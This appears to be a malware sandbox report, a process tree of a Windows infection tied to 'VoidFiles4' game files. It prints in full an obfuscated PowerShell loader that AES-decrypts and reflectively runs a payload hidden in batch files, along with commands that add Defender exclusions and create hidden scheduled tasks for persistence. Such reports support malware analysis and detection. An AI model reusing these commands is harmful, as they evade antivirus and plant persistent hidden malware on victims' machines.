C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\startup_str_933.bat'6⤵
- Suspicious behavior: EnumeratesProcesses
PID:5416
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "startup_str_933" /tr "C:\Users\Admin\AppData\Roaming\startup_str_933.bat"6⤵
- Creates scheduled task(s)
PID:2008
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wmvwjn.bat" "6⤵PID:1324
-
C:\Users\Admin\AppData\Local\Temp\wmvwjn.bat.exe"wmvwjn.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_sPSkX = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\wmvwjn.bat').Split([Environment]::NewLine);foreach ($_CASH_nvxfP in $_CASH_sPSkX) { if ($_CASH_nvxfP.StartsWith(':: @')) { $_CASH_IPzky = $_CASH_nvxfP.Substring(4); break; }; };$_CASH_IPzky = [System.Text.RegularExpressions.Regex]::Replace($_CASH_IPzky, '_CASH_', '');$_CASH_DRhpe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_IPzky);$_CASH_WhmHQ = New-Object System.Security.Cryptography.AesManaged;$_CASH_WhmHQ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_WhmHQ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_WhmHQ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('L3SmB63Eioc5iHDpiwZ9NE+XcXm5i6itm5oyIe5fVGg=');$_CASH_WhmHQ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/ZCqCyWnjvef/0r5jeI7uA==');$_CASH_jbgPi = $_CASH_WhmHQ.CreateDecryptor();$_CASH_DRhpe = $_CASH_jbgPi.TransformFinalBlock($_CASH_DRhpe, 0, $_CASH_DRhpe.Length);$_CASH_jbgPi.Dispose();$_CASH_WhmHQ.Dispose();$_CASH_RSNWG = New-Object System.IO.MemoryStream(, $_CASH_DRhpe);$_CASH_ezfuZ = New-Object System.IO.MemoryStream;$_CASH_qCDft = New-Object System.IO.Compression.GZipStream($_CASH_RSNWG, [IO.Compression.CompressionMode]::Decompress);$_CASH_qCDft.CopyTo($_CASH_ezfuZ);$_CASH_qCDft.Dispose();$_CASH_RSNWG.Dispose();$_CASH_ezfuZ.Dispose();$_CASH_DRhpe = $_CASH_ezfuZ.ToArray();$_CASH_iQSkg = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_DRhpe);$_CASH_aidzu = $_CASH_iQSkg.EntryPoint;$_CASH_aidzu.Invoke($null, (, [string[]] ('')))7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:768 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\wmvwjn')8⤵
- Suspicious behavior: EnumeratesProcesses
PID:1792
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_806_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_806.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force8⤵
- Suspicious behavior: EnumeratesProcesses
PID:6044
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_806.vbs"8⤵
- Checks computer location settings
PID:5392 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_806.bat" "9⤵PID:2852
-
C:\Users\Admin\AppData\Roaming\startup_str_806.bat.exe"startup_str_806.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_sPSkX = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_806.bat').Split([Environment]::NewLine);foreach ($_CASH_nvxfP in $_CASH_sPSkX) { if ($_CASH_nvxfP.StartsWith(':: @')) { $_CASH_IPzky = $_CASH_nvxfP.Substring(4); break; }; };$_CASH_IPzky = [System.Text.RegularExpressions.Regex]::Replace($_CASH_IPzky, '_CASH_', '');$_CASH_DRhpe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_IPzky);$_CASH_WhmHQ = New-Object System.Security.Cryptography.AesManaged;$_CASH_WhmHQ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_WhmHQ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_WhmHQ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('L3SmB63Eioc5iHDpiwZ9NE+XcXm5i6itm5oyIe5fVGg=');$_CASH_WhmHQ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/ZCqCyWnjvef/0r5jeI7uA==');$_CASH_jbgPi = $_CASH_WhmHQ.CreateDecryptor();$_CASH_DRhpe = $_CASH_jbgPi.TransformFinalBlock($_CASH_DRhpe, 0, $_CASH_DRhpe.Length);$_CASH_jbgPi.Dispose();$_CASH_WhmHQ.Dispose();$_CASH_RSNWG = New-Object System.IO.MemoryStream(, $_CASH_DRhpe);$_CASH_ezfuZ = New-Object System.IO.MemoryStream;$_CASH_qCDft = New-Object System.IO.Compression.GZipStream($_CASH_RSNWG, [IO.Compression.CompressionMode]::Decompress);$_CASH_qCDft.CopyTo($_CASH_ezfuZ);$_CASH_qCDft.Dispose();$_CASH_RSNWG.Dispose();$_CASH_ezfuZ.Dispose();$_CASH_DRhpe = $_CASH_ezfuZ.ToArray();$_CASH_iQSkg = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_DRhpe);$_CASH_aidzu = $_CASH_iQSkg.EntryPoint;$_CASH_aidzu.Invoke($null, (, [string[]] ('')))10⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2452 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\startup_str_806')11⤵
- Suspicious behavior: EnumeratesProcesses
PID:3628
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1632
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\startup_str_933.bat"1⤵PID:2920
-
C:\Users\Admin\AppData\Roaming\startup_str_933.bat.exeC:\Users\Admin\AppData\Roaming\startup_str_933.bat2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4520
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\VoidFiles4\download_game_files.bat" "1⤵PID:3952
-
C:\VoidFiles4\download_game_files.bat.exe"download_game_files.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_MaIgb = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\VoidFiles4\download_game_files.bat').Split([Environment]::NewLine);foreach ($_CASH_ZIbnE in $_CASH_MaIgb) { if ($_CASH_ZIbnE.StartsWith(':: @')) { $_CASH_aICfu = $_CASH_ZIbnE.Substring(4); break; }; };$_CASH_aICfu = [System.Text.RegularExpressions.Regex]::Replace($_CASH_aICfu, '_CASH_', '');$_CASH_URyst = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_aICfu);$_CASH_cPpEy = New-Object System.Security.Cryptography.AesManaged;$_CASH_cPpEy.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_cPpEy.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_cPpEy.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CLdjjiVR+BpNqhnulZqGWl/oZB+K1ZzNPHUKbDm15CQ=');$_CASH_cPpEy.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('f7hxiV66iKCa72zgup4qJA==');$_CASH_fpfOt = $_CASH_cPpEy.CreateDecryptor();$_CASH_URyst = $_CASH_fpfOt.TransformFinalBlock($_CASH_URyst, 0, $_CASH_URyst.Length);$_CASH_fpfOt.Dispose();$_CASH_cPpEy.Dispose();$_CASH_XPWbD = New-Object System.IO.MemoryStream(, $_CASH_URyst);$_CASH_BqTuY = New-Object System.IO.MemoryStream;$_CASH_GCnNi = New-Object System.IO.Compression.GZipStream($_CASH_XPWbD, [IO.Compression.CompressionMode]::Decompress);$_CASH_GCnNi.CopyTo($_CASH_BqTuY);$_CASH_GCnNi.Dispose();$_CASH_XPWbD.Dispose();$_CASH_BqTuY.Dispose();$_CASH_URyst = $_CASH_BqTuY.ToArray();$_CASH_ZetFq = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_URyst);$_CASH_AeuGn = $_CASH_ZetFq.EntryPoint;$_CASH_AeuGn.Invoke($null, (, [string[]] ('')))2⤵
- Executes dropped EXE
PID:3552
-
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\startup_str_933.bat"1⤵PID:4992
-
C:\Users\Admin\AppData\Roaming\startup_str_933.bat.exeC:\Users\Admin\AppData\Roaming\startup_str_933.bat2⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies system certificate store
PID:3748 -
C:\Windows\system32\wermgr.exe"C:\Windows\system32\wermgr.exe" "-outproc" "0" "3748" "2428" "2312" "2432" "0" "0" "2436" "0" "0" "0" "0" "0"3⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:4216
-
-
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\startup_str_933.bat"1⤵PID:3996
-
C:\Users\Admin\AppData\Roaming\startup_str_933.bat.exeC:\Users\Admin\AppData\Roaming\startup_str_933.bat2⤵
- Checks computer location settings
- Executes dropped EXE
PID:5032 -
C:\Windows\system32\wermgr.exe"C:\Windows\system32\wermgr.exe" "-outproc" "0" "5032" "2284" "2208" "2288" "0" "0" "2292" "0" "0" "0" "0" "0"3⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:2168
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SDRSVC1⤵PID:5428
-
C:\VoidFiles4\game_start.exe"C:\VoidFiles4\game_start.exe"1⤵PID:6048
-
C:\VoidFiles4\game_start.exe"C:\VoidFiles4\game_start.exe"2⤵
- Drops startup file
- Loads dropped DLL
PID:1220 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"3⤵PID:5676
-
C:\Windows\system32\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
PID:2264
-
-
-
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\startup_str_933.bat"1⤵PID:5528
-
C:\Users\Admin\AppData\Roaming\startup_str_933.bat.exeC:\Users\Admin\AppData\Roaming\startup_str_933.bat2⤵
- Executes dropped EXE
PID:5096
-
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\startup_str_933.bat"1⤵PID:5744
-
C:\Users\Admin\AppData\Roaming\startup_str_933.bat.exeC:\Users\Admin\AppData\Roaming\startup_str_933.bat2⤵
- Executes dropped EXE
PID:1760
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵PID:4248
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- NTFS ADS
- Suspicious use of SetWindowsHookEx
PID:5152 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5152.0.1448913577\487814713" -parentBuildID 20221007134813 -prefsHandle 1692 -prefMapHandle 1684 -prefsLen 21147 -prefMapSize 233583 -appDir "C:\Program Files\Mozilla Firefox\browser" - {96463d79-8846-47ab-8846-d502aeaeaa7a} 5152 "\\.\pipe\gecko-crash-server-pipe.5152" 1784 181f4ce5f58 gpu3⤵PID:5124
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5152.1.1941996199\1224276287" -parentBuildID 20221007134813 -prefsHandle 2188 -prefMapHandle 2184 -prefsLen 21147 -prefMapSize 233583 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1ec43f1f-81b2-4a0d-b0d0-d631abd1a35c} 5152 "\\.\pipe\gecko-crash-server-pipe.5152" 2200 181e85e3558 socket3⤵
- Checks processor information in registry
PID:5236
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5152.2.2004877050\1224231887" -childID 1 -isForBrowser -prefsHandle 3100 -prefMapHandle 2932 -prefsLen 21608 -prefMapSize 233583 -jsInitHandle 1064 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {402d4433-53aa-430a-b6d1-5dd9524e4c4b} 5152 "\\.\pipe\gecko-crash-server-pipe.5152" 2880 181f88d8a58 tab3⤵PID:6088
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5152.3.764461132\942290241" -childID 2 -isForBrowser -prefsHandle 3600 -prefMapHandle 3596 -prefsLen 26786 -prefMapSize 233583 -jsInitHandle 1064 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f823b009-e99e-447a-b8e9-580bb75183c1} 5152 "\\.\pipe\gecko-crash-server-pipe.5152" 3612 181e8562858 tab3⤵PID:2012
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5152.4.2105004714\1437014592" -childID 3 -isForBrowser -prefsHandle 4384 -prefMapHandle 4380 -prefsLen 26845 -prefMapSize 233583 -jsInitHandle 1064 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5cfd893d-b9c2-4772-bcac-4061febb02ad} 5152 "\\.\pipe\gecko-crash-server-pipe.5152" 4400 181fa41a558 tab3⤵PID:4492
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5152.6.1062655645\1407658898" -childID 5 -isForBrowser -prefsHandle 5420 -prefMapHandle 5424 -prefsLen 26845 -prefMapSize 233583 -jsInitHandle 1064 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {93488591-514c-4fdb-b86d-fb10767a0f75} 5152 "\\.\pipe\gecko-crash-server-pipe.5152" 5412 181fb18ce58 tab3⤵PID:5396
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5152.7.883103967\1020968105" -childID 6 -isForBrowser -prefsHandle 5360 -prefMapHandle 5616 -prefsLen 26845 -prefMapSize 233583 -jsInitHandle 1064 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2503d35f-a1f3-44fd-84ce-3a29e0943011} 5152 "\\.\pipe\gecko-crash-server-pipe.5152" 5268 181fb568c58 tab3⤵PID:2440
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5152.5.1054862931\2053196418" -childID 4 -isForBrowser -prefsHandle 5140 -prefMapHandle 5264 -prefsLen 26845 -prefMapSize 233583 -jsInitHandle 1064 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1ae0a7de-5436-43d7-a0f6-fd1cc699bfbd} 5152 "\\.\pipe\gecko-crash-server-pipe.5152" 5220 181e8562258 tab3⤵PID:5016
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5152.8.1034402382\1466339059" -childID 7 -isForBrowser -prefsHandle 5816 -prefMapHandle 5696 -prefsLen 26845 -prefMapSize 233583 -jsInitHandle 1064 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2e47f539-76e8-446d-907e-44fae7b2d084} 5152 "\\.\pipe\gecko-crash-server-pipe.5152" 5808 181fd69d758 tab3⤵PID:400
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5152.9.2083745757\1950627641" -childID 8 -isForBrowser -prefsHandle 5188 -prefMapHandle 5216 -prefsLen 26854 -prefMapSize 233583 -jsInitHandle 1064 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3967510b-9100-4bd8-80c2-0fc55013e131} 5152 "\\.\pipe\gecko-crash-server-pipe.5152" 5488 181f5f32b58 tab3⤵PID:2552
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5152.10.1405355813\1510141257" -childID 9 -isForBrowser -prefsHandle 6048 -prefMapHandle 2820 -prefsLen 26950 -prefMapSize 233583 -jsInitHandle 1064 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {11bbbd3d-9c79-4be5-9e74-e22eafc3a345} 5152 "\\.\pipe\gecko-crash-server-pipe.5152" 6108 181e856c158 tab3⤵PID:3192
-
-
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\startup_str_933.bat"1⤵PID:5820
-
C:\Users\Admin\AppData\Roaming\startup_str_933.bat.exeC:\Users\Admin\AppData\Roaming\startup_str_933.bat2⤵
- Executes dropped EXE
PID:1048
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Visual-C-Runtimes-All-in-One-Nov-2023\install_all.bat" "1⤵PID:5388
-
C:\Users\Admin\Downloads\Visual-C-Runtimes-All-in-One-Nov-2023\vcredist2005_x86.exevcredist2005_x86.exe /q2⤵
- Adds Run key to start application
PID:5096 -
C:\Windows\SysWOW64\msiexec.exemsiexec /i vcredist.msi3⤵
- Enumerates connected drives
PID:1440
-
-
-
C:\Users\Admin\Downloads\Visual-C-Runtimes-All-in-One-Nov-2023\vcredist2005_x64.exevcredist2005_x64.exe /q2⤵
- Adds Run key to start application
PID:5256 -
C:\Windows\SysWOW64\msiexec.exemsiexec /i vcredist.msi3⤵
- Enumerates connected drives
PID:540
-
-
-
C:\Users\Admin\Downloads\Visual-C-Runtimes-All-in-One-Nov-2023\vcredist2008_x86.exevcredist2008_x86.exe /qb2⤵PID:5032
-
\??\f:\93b2fe408b1b9c0dc61f99bb\install.exef:\93b2fe408b1b9c0dc61f99bb\.\install.exe /qb3⤵
- Executes dropped EXE
PID:5552
-
-
-
C:\Users\Admin\Downloads\Visual-C-Runtimes-All-in-One-Nov-2023\vcredist2008_x64.exevcredist2008_x64.exe /qb2⤵PID:840
-
\??\f:\8ae3d10f9238e748098a42\install.exef:\8ae3d10f9238e748098a42\.\install.exe /qb3⤵
- Executes dropped EXE
PID:4520
-
-
-
C:\Users\Admin\Downloads\Visual-C-Runtimes-All-in-One-Nov-2023\vcredist2010_x86.exevcredist2010_x86.exe /passive /norestart2⤵PID:3996
-
\??\f:\63bb1ce8c8028a494aa308f4\Setup.exef:\63bb1ce8c8028a494aa308f4\Setup.exe /passive /norestart3⤵
- Executes dropped EXE
- Checks processor information in registry
PID:4684
-
-
-
C:\Users\Admin\Downloads\Visual-C-Runtimes-All-in-One-Nov-2023\vcredist2010_x64.exevcredist2010_x64.exe /passive /norestart2⤵PID:2196
-
\??\f:\82d6eaa82f5cd7720dfb42\Setup.exef:\82d6eaa82f5cd7720dfb42\Setup.exe /passive /norestart3⤵
- Executes dropped EXE
- Checks processor information in registry
PID:5752
-
-
-
C:\Users\Admin\Downloads\Visual-C-Runtimes-All-in-One-Nov-2023\vcredist2012_x86.exevcredist2012_x86.exe /passive /norestart2⤵
- Adds Run key to start application
PID:1472 -
C:\Users\Admin\Downloads\Visual-C-Runtimes-All-in-One-Nov-2023\vcredist2012_x86.exe"C:\Users\Admin\Downloads\Visual-C-Runtimes-All-in-One-Nov-2023\vcredist2012_x86.exe" /passive /norestart -burn.unelevated BurnPipe.{3CEA8D8E-A335-4481-989E-032BC06DE913} {4A11F426-59D3-40CA-AD4F-A31F52AA875B} 14723⤵PID:5796
-
-
-
C:\Users\Admin\Downloads\Visual-C-Runtimes-All-in-One-Nov-2023\vcredist2012_x64.exevcredist2012_x64.exe /passive /norestart2⤵
- Adds Run key to start application
PID:6084 -
C:\Users\Admin\Downloads\Visual-C-Runtimes-All-in-One-Nov-2023\vcredist2012_x64.exe"C:\Users\Admin\Downloads\Visual-C-Runtimes-All-in-One-Nov-2023\vcredist2012_x64.exe" /passive /norestart -burn.unelevated BurnPipe.{02E736AC-1080-4157-997A-BF32BF50888B} {A6467A07-FE69-43FD-8266-23D530B8F6DD} 60843⤵PID:4508
-
-
-
C:\Users\Admin\Downloads\Visual-C-Runtimes-All-in-One-Nov-2023\vcredist2013_x86.exevcredist2013_x86.exe /passive /norestart2⤵
- Adds Run key to start application
PID:840 -
C:\Users\Admin\Downloads\Visual-C-Runtimes-All-in-One-Nov-2023\vcredist2013_x86.exe"C:\Users\Admin\Downloads\Visual-C-Runtimes-All-in-One-Nov-2023\vcredist2013_x86.exe" /passive /norestart -burn.unelevated BurnPipe.{C49C5A10-36E5-4D2B-A60A-9AE4FF170AEB} {BF12C16A-0B74-4DBF-9568-FD7AF3775A38} 8403⤵PID:5324
-
-
C:\ProgramData\Package Cache\{61087a79-ac85-455c-934d-1fa22cc64f36}\vcredist_x86.exe"C:\ProgramData\Package Cache\{61087a79-ac85-455c-934d-1fa22cc64f36}\vcredist_x86.exe" -uninstall -quiet -burn.related.upgrade -burn.ancestors={9dff3540-fc85-4ed5-ac84-9e3c7fd8bece} -burn.embedded BurnPipe.{50B93ECD-2A9C-4123-AF00-7887E96B647C} {0CA47158-65A7-4EC5-BC4F-27B761BE64DB} 8403⤵
- Modifies registry class
PID:3524
-
-
-
C:\Users\Admin\Downloads\Visual-C-Runtimes-All-in-One-Nov-2023\vcredist2013_x64.exevcredist2013_x64.exe /passive /norestart2⤵
- Adds Run key to start application
- Modifies registry class
PID:3112 -
C:\Users\Admin\Downloads\Visual-C-Runtimes-All-in-One-Nov-2023\vcredist2013_x64.exe"C:\Users\Admin\Downloads\Visual-C-Runtimes-All-in-One-Nov-2023\vcredist2013_x64.exe" /passive /norestart -burn.unelevated BurnPipe.{0F438B3D-77DE-41FE-8960-E2D3E562E9F0} {98544365-E33E-4798-A9CB-B629EC0FAEC8} 31123⤵PID:5904
-
-
C:\ProgramData\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\vcredist_x64.exe"C:\ProgramData\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\vcredist_x64.exe" -uninstall -quiet -burn.related.upgrade -burn.ancestors={042d26ef-3dbe-4c25-95d3-4c1b11b235a7} -burn.embedded BurnPipe.{4F0D4AFA-0A7F-4C85-A414-DC2DE7DE3FA5} {F7501521-6E3A-4385-9890-503D81BFE64A} 31123⤵
- Modifies registry class
PID:1784 -
C:\ProgramData\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\vcredist_x64.exe"C:\ProgramData\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\vcredist_x64.exe" -uninstall -quiet -burn.related.upgrade -burn.ancestors={042d26ef-3dbe-4c25-95d3-4c1b11b235a7} -burn.embedded BurnPipe.{4F0D4AFA-0A7F-4C85-A414-DC2DE7DE3FA5} {F7501521-6E3A-4385-9890-503D81BFE64A} 3112 -burn.unelevated BurnPipe.{E789C629-41D8-4BF8-A057-94C0D9692D55} {494A0E1F-058B-4B89-AD20-0568CEF0BA6E} 17844⤵PID:2284
-
-
-
-
C:\Users\Admin\Downloads\Visual-C-Runtimes-All-in-One-Nov-2023\vcredist2015_2017_2019_2022_x86.exevcredist2015_2017_2019_2022_x86.exe /passive /norestart2⤵PID:5788
-
C:\Windows\Temp\{C7A8FECB-32EA-4C1D-BFF7-67FB3CACF082}\.cr\vcredist2015_2017_2019_2022_x86.exe"C:\Windows\Temp\{C7A8FECB-32EA-4C1D-BFF7-67FB3CACF082}\.cr\vcredist2015_2017_2019_2022_x86.exe" -burn.clean.room="C:\Users\Admin\Downloads\Visual-C-Runtimes-All-in-One-Nov-2023\vcredist2015_2017_2019_2022_x86.exe" -burn.filehandle.attached=572 -burn.filehandle.self=196 /passive /norestart3⤵
- Checks computer location settings
- Executes dropped EXE
PID:6032 -
C:\Windows\Temp\{16902992-E63D-447E-BE17-9ADC7F07B858}\.be\VC_redist.x86.exe"C:\Windows\Temp\{16902992-E63D-447E-BE17-9ADC7F07B858}\.be\VC_redist.x86.exe" -q -burn.elevated BurnPipe.{2E8BB61D-7D46-4E64-86E6-2C85998FEBCD} {17402B9B-636A-497A-B305-EAA7D5D5904A} 60324⤵
- Executes dropped EXE
- Adds Run key to start application
- Modifies registry class
PID:5180 -
C:\ProgramData\Package Cache\{4d8dcf8c-a72a-43e1-9833-c12724db736e}\VC_redist.x86.exe"C:\ProgramData\Package Cache\{4d8dcf8c-a72a-43e1-9833-c12724db736e}\VC_redist.x86.exe" -uninstall -quiet -burn.related.upgrade -burn.ancestors={2cfeba4a-21f8-4ea7-9927-c5a5c6f13cc9} -burn.filehandle.self=1008 -burn.embedded BurnPipe.{554AE962-CF41-46D6-972A-FABC34F631F6} {C4941FA5-CBFF-42FE-A517-8FF2EB6B7C44} 51805⤵PID:1152
-
-
-
-
-
C:\Users\Admin\Downloads\Visual-C-Runtimes-All-in-One-Nov-2023\vcredist2015_2017_2019_2022_x64.exevcredist2015_2017_2019_2022_x64.exe /passive /norestart2⤵PID:5492
-
C:\Windows\Temp\{010EABD5-352A-42F0-8A02-D2C687A88191}\.cr\vcredist2015_2017_2019_2022_x64.exe"C:\Windows\Temp\{010EABD5-352A-42F0-8A02-D2C687A88191}\.cr\vcredist2015_2017_2019_2022_x64.exe" -burn.clean.room="C:\Users\Admin\Downloads\Visual-C-Runtimes-All-in-One-Nov-2023\vcredist2015_2017_2019_2022_x64.exe" -burn.filehandle.attached=560 -burn.filehandle.self=664 /passive /norestart3⤵
- Checks computer location settings
- Executes dropped EXE
PID:5020 -
C:\Windows\Temp\{19DFD7E0-1F60-488F-B193-1168E4E83C4A}\.be\VC_redist.x64.exe"C:\Windows\Temp\{19DFD7E0-1F60-488F-B193-1168E4E83C4A}\.be\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{4EF7390A-87FE-4B45-88EA-D1BAE1712FE2} {BA7FFEA9-AE51-4546-8112-AB01789A401C} 50204⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1932 -
C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe"C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe" -uninstall -quiet -burn.related.upgrade -burn.ancestors={1de5e707-82da-4db6-b810-5d140cc4cbb3} -burn.filehandle.self=1116 -burn.embedded BurnPipe.{0B3FF07B-42C4-4A51-B00A-CCB9D580E50D} {BE643124-F241-43A7-9BFC-F2FF76C3E690} 19325⤵PID:5460
-
-
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
PID:5836 -
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵PID:5316
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 9904665B5C0C455399B9D85423F943DF2⤵PID:5216
-
-
